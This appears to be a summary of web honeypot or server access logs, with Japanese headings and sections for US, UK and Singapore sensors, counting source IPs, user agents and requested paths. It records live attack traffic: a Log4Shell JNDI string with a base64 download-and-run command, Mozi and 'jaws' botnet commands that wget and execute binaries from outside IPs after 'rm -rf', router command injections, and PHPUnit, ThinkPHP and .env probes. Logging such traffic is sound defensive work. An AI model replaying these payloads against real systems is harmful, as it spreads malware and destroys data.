1 POST //modules/ps_facetedsearch/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //modules/pscartabandonmentpro/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //old/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //old/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //old/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //phpunit/Util/PHP/eval-stdin.php%20 HTTP/1.1
1 POST //phpunit/phpunit/Util/PHP/eval-stdin.php%20 HTTP/1.1
1 POST //test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //test/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //test/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //test/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //vendor/phpunit/Util/PHP/eval-stdin.php%20 HTTP/1.1
1 POST //vendor/phpunit/phpunit/Util/PHP/eval-stdin.php%20 HTTP/1.1
1 POST //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //wordpress/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //wordpress/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //wordpress/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //wp-content/plugins/contact-form-7-to-database-extension/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //wp-content/plugins/js_composer_theme/vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //wp-content/themes/Divi-child/inc/meta/tests/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //wp-content/themes/howto_wp/metabox/tests/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //wp/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //wp/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //wp/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST //~champiot/Laravel%20E2N%20test/tuto_laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //~champiot/tuto_laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
2 13.82.124.140 United States
2 23.95.100.141 United States
1 23.129.64.211 United States
1 34.77.162.9 United States
1 37.0.8.109 Netherlands
1 45.137.21.166 Bangladesh
7 45.146.165.37 Russia
2 45.227.254.26 Belize
1 109.237.103.9 Russia
2 109.237.103.38 Russia
1 109.237.103.123 Russia
1 120.85.115.79 China
1 137.184.45.98 United States
1 137.184.238.43 United States
1 139.162.145.250 Netherlands
4 157.245.70.127 United States
1 159.223.130.128 United States
1 159.223.139.250 United States
1 162.142.125.8 United States
4 164.52.24.179 China
1 164.90.135.111 United States
9 185.254.196.223 Ukraine
1 192.210.163.15 United States
2 194.31.98.117 Netherlands
1 207.32.217.228 United States
1 209.17.97.74 United States
1 209.17.97.106 United States
2 212.192.246.29 Czechia
1 221.5.61.172 China
3 222.186.19.235 China
1 223.130.30.225 India

UserAgent一覧

件数 UserAgent
21 -
2 Hello, World
1 Hello, world
4 Mozila/5.0
7 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/7.0.0 Safari/700.13
18 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.634.0 Safari/534.16
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//178[.]62[.]196[.]118:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vNTEuMTYxLjY0LjE5Ny84VXNBMi5zaDsgY3VybCAtTyBodHRwOi8vNTEuMTYxLjY0LjE5Ny84VXNBMi5zaDsgY2htb2QgNzc3IDhVc0EyLnNoOyBzaCA4VXNBMi5zaDsgcm0gLXJmICo=}')

リクエスト内容一覧

件数 Method Request Protocol
2 \x03
1 \x16\x03\x01\x01C\x01
1 \x16\x03\x01\x01 \x01
8 \x16\x03\x01
2 \x16\x03\x03
18 GET /.env HTTP/1.1
1 GET /:undefined HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
2 GET /ab2g HTTP/1.1
2 GET /ab2h HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//221[.]5[.]61[.]172:35145/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
2 HEAD / HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
4 POST /HNAP1/ HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
2 23.95.100.141 United States
1 23.129.64.140 United States
1 34.77.162.21 United States
1 41.39.10.245 Egypt
1 45.137.21.166 Bangladesh
5 45.146.165.37 Russia
2 45.227.254.10 Belize
1 59.36.168.250 China
1 103.162.30.101 Vietnam
1 109.237.103.9 Russia
1 109.237.103.123 Russia
1 114.80.20.59 China
1 115.97.136.35 India
1 117.207.229.226 India
1 120.85.117.236 China
1 125.118.43.29 China
1 137.184.45.98 United States
1 156.199.157.57 Egypt
1 156.222.236.210 Egypt
2 157.245.70.127 United States
1 162.142.125.211 United States
4 164.52.24.179 China
1 190.213.155.143 Trinidad and Tobago
1 192.241.212.228 United States
3 194.31.98.117 Netherlands
1 197.237.138.22 Kenya
2 212.192.246.29 Czechia
4 222.186.19.235 China

UserAgent一覧

件数 UserAgent
20 -
2 Hello, World
2 Hello, world
5 Mozila/5.0
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.2 Safari/532.0
4 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.470.0 Safari/534.3
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//178[.]62[.]196[.]118:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vNTEuMTYxLjY0LjE5Ny84VXNBMi5zaDsgY3VybCAtTyBodHRwOi8vNTEuMTYxLjY0LjE5Ny84VXNBMi5zaDsgY2htb2QgNzc3IDhVc0EyLnNoOyBzaCA4VXNBMi5zaDsgcm0gLXJmICo=}')

リクエスト内容一覧

件数 Method Request Protocol
2 -
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 MGLNDD_132.145.66.34_80\n
2 \x03
1 \x16\x03\x01\x01 \x01
4 \x16\x03\x01
4 GET /.env HTTP/1.1
1 GET /:undefined HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
1 GET /favicon.ico HTTP/1.1
3 GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws
1 GET /shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+31[.]210[.]20[.]109/jaws;sh+/tmp/jaws HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
2 HEAD / HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
5 POST /HNAP1/ HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 4.17.224.134 United States
2 13.82.124.140 United States
1 20.55.53.144 United States
1 20.223.159.160 United States
1 20.225.62.230 United States
2 23.95.100.141 United States
1 34.77.162.19 United States
1 45.77.239.190 United States
2 45.137.21.166 Bangladesh
4 45.146.165.37 Russia
1 58.255.143.22 China
1 68.183.124.137 United States
2 104.41.148.0 United States
1 109.237.103.9 Russia
1 109.237.103.123 Russia
1 116.68.103.160 India
1 116.230.71.139 China
1 137.184.45.98 United States
1 139.162.145.250 Netherlands
1 143.198.8.32 United States
1 156.216.136.181 Egypt
2 157.230.216.203 United States
1 159.223.130.128 United States
1 162.142.125.210 United States
1 164.92.89.135 United States
1 167.94.138.63 United States
1 167.94.146.57 United States
1 175.100.20.202 Cambodia
1 182.123.192.154 China
1 183.136.225.42 China
1 183.136.226.3 China
8 185.254.196.223 Ukraine
1 188.166.234.82 United States
1 192.241.222.231 United States
1 194.31.98.117 Netherlands
2 194.165.16.73 Panama
3 199.34.18.238 United States
1 209.17.97.58 United States
3 222.186.19.235 China

UserAgent一覧

件数 UserAgent
23 -
1 Anarchy99
1 Mozila/5.0
1 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
1 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.151.0 Safari/525.19
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
22 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//178[.]62[.]196[.]118:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vNTEuMTYxLjY0LjE5Ny84VXNBMi5zaDsgY3VybCAtTyBodHRwOi8vNTEuMTYxLjY0LjE5Ny84VXNBMi5zaDsgY2htb2QgNzc3IDhVc0EyLnNoOyBzaCA4VXNBMi5zaDsgcm0gLXJmICo=}')

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_13.67.44.234_80
2 \x03
1 \x16\x03\x01\x01\xfb\x01
1 \x16\x03\x01\x02
4 \x16\x03\x01
2 \x16\x03\x03
24 GET /.env HTTP/1.1
1 GET /:undefined HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /TeWF6LhPqDipUgxMHy7NOsrGJbP HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
1 GET /console/ HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//182[.]123[.]192[.]154:54498/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//58[.]255[.]143[.]22:44191/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
2 HEAD / HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /HNAP1/ HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
3 PRI * HTTP/2.0